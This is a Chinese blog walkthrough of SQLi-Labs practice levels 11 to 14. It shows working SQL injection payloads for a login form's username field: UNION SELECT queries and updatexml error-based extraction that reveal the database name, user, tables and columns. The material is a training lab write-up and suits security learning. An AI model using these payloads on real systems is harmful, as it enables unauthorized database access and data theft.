当前位置: 首页 > wzjs >正文

昆明体育城微网站建设百度上做优化一年多少钱

wzjs 2025/8/1 23:27:26
昆明体育城微网站建设,百度上做优化一年多少钱,网络营销知名企业,崇左做网站公司SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。Less 11 SQLI DUMB SERIES-11判断注入点 尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单…
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

Less 11

SQLI DUMB SERIES-11

welcome dhakkan

判断注入点

尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单引号:
login attempt
同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。

uname=admin' -- &passwd=1

在这里插入图片描述

实施注入

获取数前数据库的数据名和用户名

uname=0' union select database(),user() from dual -- &passwd=1

logged in
获取当前数据库的表名:

uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &passwd=1

successfully logged in
获取user表的列名:

uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- &passwd=1

获取用户名

Less 12

SQLI DUMB SERIES-12

通过输入判断出查询字符串的闭合方式为")
security
同样通过这一个点获取数据库名和用户名。

uname=0") union select database(),user() from dual -- &passwd=1

在这里插入图片描述

Less 13

SQLI DUMB SERIES-13

判断注入点

SQL语句错误,提示异常。

uname=0'&passwd=1

在这里插入图片描述
正常输入结果显示成功,不过没有任何提示内容。

uname=admin') -- &passwd=1

admin
如果是这样的话,那就只能通过错误信息来获取数据了,如下所示

uname=0') and updatexml(1,concat(user()),1) -- &passwd=1

localhost

实施注入

uname=0') and updatexml(1,concat('~',(database())),1) -- &passwd=1

welcome login attempt
获取当前数据库所有的表名

uname=0') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) -- &passwd=1

failed
获取user表所有的列名

uname=0') and updatexml(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1) -- &passwd=1

123
到此注入成功

Less 14

SQLI DUMB SERIES-14

在这里插入图片描述

判断注入点

测试双引号报错。

uname=admin "&passwd=1

在这里插入图片描述
然后经测试采用双引号加注释符就可以验证登录成功。

uname=admin "-- &passwd=1

admin
但这样还不能获取数据,则判断这个注入方式为错误注入。
通过updatexml方法即可成功注入

uname=admin " and updatexml(1,user(),3)-- &passwd=1

在这里插入图片描述

实施注入

获取数据库名

uname=admin " and updatexml(1,concat('~',database()),3)-- &passwd=1

在这里插入图片描述

获取当前数据库所有的表名

uname=admin " and updatexml(1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3)-- &passwd=1

在这里插入图片描述
获取user表所有的列名

uname=admin " and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),3)-- &passwd=1

在这里插入图片描述

系列文章

  • sqli-labs 靶场闯关基础准备
  • sqli-labs 靶场 less-1、2、3、4第一关至第四关
  • sqli-labs 靶场 less-5、6 第五关和第六关
  • sqli-labs 靶场 less-7
  • sqli-labs 靶场 less-8、9、10
http://www.dtcms.com/wzjs/161782.html

相关文章:

  • 做零售的外贸网站扬中网站制作
  • 汕头站扩建什么时候完成自贡网站seo
  • 个人网站可以做经营性网站网址seo关键词
  • 表格里怎么做链接网站软文营销常用的方式是什么
  • 最专业的手机网站制作优化疫情防控
  • 武汉手游网站开发google优化排名
  • 做网站需要注意的点营销案例100例小故事及感悟
  • dw制造网站log怎么做网络营销方式有哪些
  • 石家庄哪里能制作网站2021全国大学生营销大赛
  • 哈尔滨网站建设推荐搜索引擎案例分析结论
  • 怀柔广州网站建设seo优化视频教程
  • 个人站长做哪些网站好关键词林俊杰mp3在线听
  • 商场网站方案二级域名分发平台
  • 网站怎么做播放器网络推广课程培训
  • 媒体网站建设seo零基础视频教程
  • 运城做网站要多少钱360推广和百度推广哪个好
  • 动态网站建设步骤网络营销seo是什么意思
  • wordpress主题栏是什么seo优化排名易下拉用法
  • 独立网站系统近日发生的重大新闻
  • 飞飞cms官网合肥优化排名推广
  • 用dw做的网页怎么上传到网站交换链接营销案例
  • 网站承载量怎么做发布外链的步骤
  • 制作表格的软件西安seo报价
  • 做地推的网站建设网站公司
  • 十堰h5网站建设如何做好网站站内优化
  • 一个网站里面只放一个图片怎么做信息流优化师发展前景
  • 网站首页怎么做ps360seo优化
  • cdr 做网站页面免费正规大数据查询平台
  • 网站做贷款许可证优化网站做什么的
  • 手机网站开发步骤合肥关键词排名提升